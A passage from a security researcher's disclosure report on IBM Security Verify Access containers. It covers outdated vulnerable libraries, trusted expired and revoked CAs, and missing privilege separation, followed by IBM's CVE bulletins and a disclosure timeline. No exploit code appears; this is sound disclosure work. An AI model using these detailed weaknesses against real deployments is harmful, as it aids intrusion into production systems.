https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code regarding a `DeepRecursion` class or any method implemented in the security patches. This `DeepRecursion` class is included in the now-patched versions. \n\nThe IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807. \n\nAnalysis of the security patches implementing new classes:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the `libtivsec_yamlcpp.so` library. This allows us to conclude the security patches have not been imported into the `libtivsec_yamlcpp.so` library. \n\nSource code providing security patches:\n\nMethod `HandleNode()` from the security patches and the patched versions of yaml-cpp:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWith the assembly code extracted from the `libtivsec_yamlcpp.so` library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - with the lack of the patch located on the line 51. \n\nPseudo-code of method `HandleNode()`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis allows us to conclude that the `libtivsec_yamlcpp.so` library is vulnerable to these 4 CVEs. \n\n\n\n### libtivsec_xml4c.so - outdated Xerces-C library\n\nThis library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in `/usr/lib64/libtivsec_xml4c.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so`) and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C doesn\u0027t exist anymore and the latest release appears to be from 2007-2008). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version appears to be quite outdated and is likely vulnerable to known CVEs (https://xerces.apache.org/xerces-c/secadv.html). \n\n\n\n## Details - Outdated and untrusted CAs used in the Docker images\n\nIt was observed that the Docker images will trust invalid Certificate Authorities (CA). \n\nUsing the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images. \n\nIt appears that these 4 Docker images trust some invalid, revoked or untrusted CAs. \n\nResults for ibmcom/verify-access:10.0.4.0:\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0\nCertificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\\, Inc. - For authorized use only,O=VeriSign\\, Inc.,C=US\n removed from Mozilla trust store, no reason given\n\nCertificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry)\n\nCertificate CN=Test CA,O=genua mbh\n expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry)\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 395 certificates total, of which 21 had issues\n\u003c/pre\u003e\n\n\n\nResults for:\n\n- - ibmcom/verify-access-runtime:10.0.4.0\n- - ibmcom/verify-access-wrp:10.0.4.0 \n- - ibmcom/verify-access-dsc:10.0.4.0\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 374 certificates total, of which 18 had issues\n\u003c/pre\u003e\n\nThe communications used in the ISVA platform use SSL/TLS with a trust entirely based on underlying CAs. Some CAs have been revoked and cannot be trusted anymore. \n\nThe presence of revoked and expired CAs also shows that the security of the Docker images is highly perfectible. \n\n\n\n## Details - Lack of privilege separation in Docker instances\n\nIt was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege. \n\nUsing dynamic analysis, the ibmcom/verify-access-wrp:10.0.4.0 Docker image,  ibmcom/verify-access:10.0.4.0 Docker image, and the ibmcom/verify-access-runtime Docker image do not correctly implement privilege separation. \n\nProcesses running inside the ibmcom/verify-access:10.0.4.0 Docker image:\n\n    USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\n    isam           1  0.0  0.0  12060  2812 ?        Ss   Oct21   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         312  0.0  0.0  24532    56 ?        Ss   Oct21   0:00 /usr/sbin/mesa_crashd\n    isam         314  0.1  0.0  24568  2056 ?        R    Oct21   6:20 /usr/sbin/mesa_crashd\n    isam         318  0.0  0.0  69160  2732 ?        Ss   Oct21   0:00 /usr/sbin/mesa_syslogd\n    isam         322  0.0  0.0  69224  2164 ?        S    Oct21   0:02 /usr/sbin/mesa_syslogd\n    isam         399  0.0  0.0 102760  2740 ?        Ss   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000\n    isam         400  0.0  0.1 711216  8276 ?        Sl   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000\n    isam         747  0.0  0.0 270992  7452 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap \n    isam         756  0.0  0.0 271124  7308 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n    isam         807  0.0  0.0  71488  3084 ?        Ss   Oct21   0:00 /usr/sbin/iss-lum\n    isam         808  0.0  0.5 343920 42140 ?        Sl   Oct21   0:00 /usr/sbin/iss-lum\n    isam         833  0.0  0.0 128400  5140 ?        Ssl  Oct21   0:00 /usr/sbin/rsyslogd\n    isam         873  0.0  0.0 273920  7080 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n    isam         879  1.5  0.5 563872 42292 ?        Sl   Oct21  71:40 wga_notifications -foreground\n    isam         892  0.0  0.0  12060  1804 ?        S    Oct21   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         895  0.0  0.0  23068  1256 ?        S    Oct21   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n    isam      573957  0.0  0.0  47620  3696 pts/0    Rs+  16:53   0:00 ps -aux\n    isam      573963  0.0  0.0  11928  2852 ?        S    16:53   0:00 sh -c ls /var/support/core_*.* | wc -l\n    \n    pgresql      434  0.0  0.2 188380 17492 ?        Ss   Oct21   0:06 /usr/bin/postgres -D /var/postgresql/config/data\n    pgresql      435  0.0  0.0 138892  2960 ?        Ss   Oct21   0:00 postgres: logger\n    pgresql      446  0.0  0.0 188380  2696 ?        Ss   Oct21   0:00 postgres: checkpointer\n    pgresql      447  0.0  0.0 188516  4676 ?        Ss   Oct21   0:03 postgres: background writer\n    pgresql      448  0.0  0.0 188380  5148 ?        Ss   Oct21   0:03 postgres: walwriter\n    pgresql      449  0.0  0.0 189112  5312 ?        Ss   Oct21   0:04 postgres: autovacuum launcher\n    pgresql      450  0.0  0.0 139024  3016 ?        Ss   Oct21   0:15 postgres: stats collector\n    pgresql      451  0.0  0.0 188916  5492 ?        Ss   Oct21   0:00 postgres: logical replication launcher\n    \n    www-data     547  0.3  6.2 4925056 499744 ?      SLl  Oct21  18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de\n    \n    ivmgr        761  0.0  0.5 873712 44896 ?        Sl   Oct21   0:04 /opt/PolicyDirector/bin/pdmgrd -foreground\n    ivmgr        863  0.0  0.1 276544  8440 ?        Sl   Oct21   0:00 /usr/sbin/wga_servertaskd\n    \n    ldap         752  0.0 10.3 1314228 822572 ?      Sl   Oct21   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n    \n    root         813  0.0  0.0  41984  3528 ?        Ss   Oct21   0:01 /usr/sbin/crond\n    root         862  0.0  0.0 174348  2828 ?        Ss   Oct21   0:00 /usr/sbin/wga_servertaskd\n\nSome processes are running as `isam`. For example, the rsyslogd processys runs as `isam`. If a program running as `isam` is compromised inside an instance, then all the programs running as isam are also compromised. \n\nProcesses running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:\n\n    PID   USER     TIME  COMMAND\n        1 isam      9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf\n       32 isam      0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n\nThe only 2 processes are running as `isam`. \n\n\nProcesses running inside the ibmcom/verify-access-runtime: 10.0.4.0 Docker image:\n\n    PID   USER     TIME  COMMAND\n        1 isam      1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps\n       38 isam      0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n       63 isam      0:04 /usr/bin/postgres -D /var/postgresql/config/data\n       64 isam      0:00 postgres: logger   \n       66 isam      0:00 postgres: checkpointer   \n       67 isam      0:00 postgres: background writer   \n       68 isam      0:00 postgres: walwriter   \n       69 isam      0:01 postgres: autovacuum launcher   \n       70 isam      0:05 postgres: stats collector   \n       71 isam      0:00 postgres: logical replication launcher   \n    37169 isam      0:00 bash\n    37186 isam      0:00 ps -a\n\nIn the `ibmcom/verify-access-runtime` instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as isam. \n\nIf a program running as `isam` is compromised inside an instance, then the all the programs running as isam are also compromised. \n\n\n\n## Vendor Response\n\nIBM provided several security bulletins:\n\nSecurity Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:\n\n- - CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. \n- - CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed. \n- - CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions. \n- - CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user to do improper permission controls. \n- - CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages. \n\nSecurity Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:\n\n- - CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:\n\n- - CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information. \n- - CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration. \n- - CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption. \n- - CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password. \n- - CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. \n- - CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation. \n- - CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques. \n- - CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server. \n- - CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server. \n- - CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server. \n- - CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access. \n- - CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:\n\n- - CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation. \n- - CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n- - CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n\n\n\n## Report Timeline\n\n* October 2022: Security assessment performed on IBM Security Verify Access. \n* Feb 12, 2023: A complete report was sent to IBM. \n* Feb 13, 2023: IBM acknowledged the reception of the security assessment and said that scan tools usually report a lot of issues so I have to check the status of detected CVEs by browsing RedHat webpages and create an issue for each CVE. \n* Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner. \n* Feb 14, 2023: Asked for an update. \n* Feb 14, 2023: IBM confirmed that the report was shared with L3 and \"IBM hacking team\". \n* Feb 22, 2023: IBM said they were still assessing the report. \n* Mar 13, 2023: An additional report on ibmsecurity was sent to IBM. \n* Mar 13, 2023: IBM confirmed that the second report was shared with L3 team. \n* Mar 15, 2023: IBM wanted to organize a meeting about the findings. \n* Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion. \n* Apr 4, 2023: I asked again IBM to confirm the vulnerabilities\n* Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities. \n* Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting. \n* Apr 11, 2023: IBM confirmed a meeting is possible. \n* Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023. \n* Apr 18, 2023: IBM confirmed a meeting is possible. \n* Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present. \n* Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023. \n* Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities. \n* Apr 23, 2023: I asked to have a second meeting about ibmsecurity. \n* Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity. \n* Apr 24, 2023: I asked the timeline to get security patches. \n* Apr 24, 2023: IBM confirmed there are no ETA to get security patches. \n* Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues. \n* May 10, 2023: I asked for CVE identifiers to track the vulnerabilities. \n* May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress. \n* May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities. \n* Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release. \n* Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory. \n* Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team. \n* Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities. \n* Jul 12, 2023: IBM said that they do not credit security researchers. \n* Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430. \n* Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case. \n* Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed. \n* Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 is one of the reported vulnerabilities and in any case, it is impossible to edit the security bulletin and give credits. \n* Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published]. \n* Aug 17, 2023: I asked again information about ibmsecurity and CVE-2023-25927. \n* Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilties, security patches of ibmsecurity and status of CVE-2023-25927). \n* Oct 25, 2023: IBM asked to organize a meeting. \n* Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity. \n* Oct 25, 2023: IBM replied they wanted to discuss about the vulnerabilities in a meeting. \n* Oct 29, 2023: IBM asked to organize a meeting again. \n* Oct 30, 2023: I accepted the meeting and I asked IBM to provide the list of vulnerabilities that would be patched with their current status. I also asked the status of ibmsecurity. \n* Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023. \n* Nov 2, 2023: I confirmed my presence to the meeting. \n* Nov 5, 2023: IBM confirmed the meeting. \n* Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedbacks for several vulnerabilities. Also IBM confirmed that several vulnerabilities would be patched in 2024 and ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appears to be invalid (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_). \n* Nov 21, 2023: IBM asked me to review the new report shared by IBM. \n* Nov 28, 2023: IBM asked for updates. \n* Dec 4, 2023: I answered that I did not have anymore access to the test infrastructure and IBM had to wait for my analysis until I get again access to the test infrastructure. \n* Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible. \n* Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities. \n* Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities. \n* Dec 27, 2023: IBM confirmed the reception of the new analysis. \n* Jan 15, 2024: IBM asked me to update ISVA and recheck all the vulnerabilities. \n* Jan 16, 2024: I asked IBM if ibmsecurity was also patched. \n* Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!). \n* Jan 22, 2024: IBM wanted to organize a new meeting. \n* Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months ago). \n* Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of vulnerabilities were indeed patched. \n* Jan 24, 2024: IBM created a new case for ibmsecurity. \n* Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7). \n* Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM. \n* Feb 7, 2024: IBM confirmed that some of the vulnerabilities were \"being processed\" and that some of vulnerabilities had been also silently patched and no security bulletins had been published. \n* Feb 20, 2024: IBM asked for updates. \n* Feb 20, 2024: I asked when would be the release date for ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release. \n* Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024. \n* Feb 23, 2024: I sent a new vulnerability to IBM 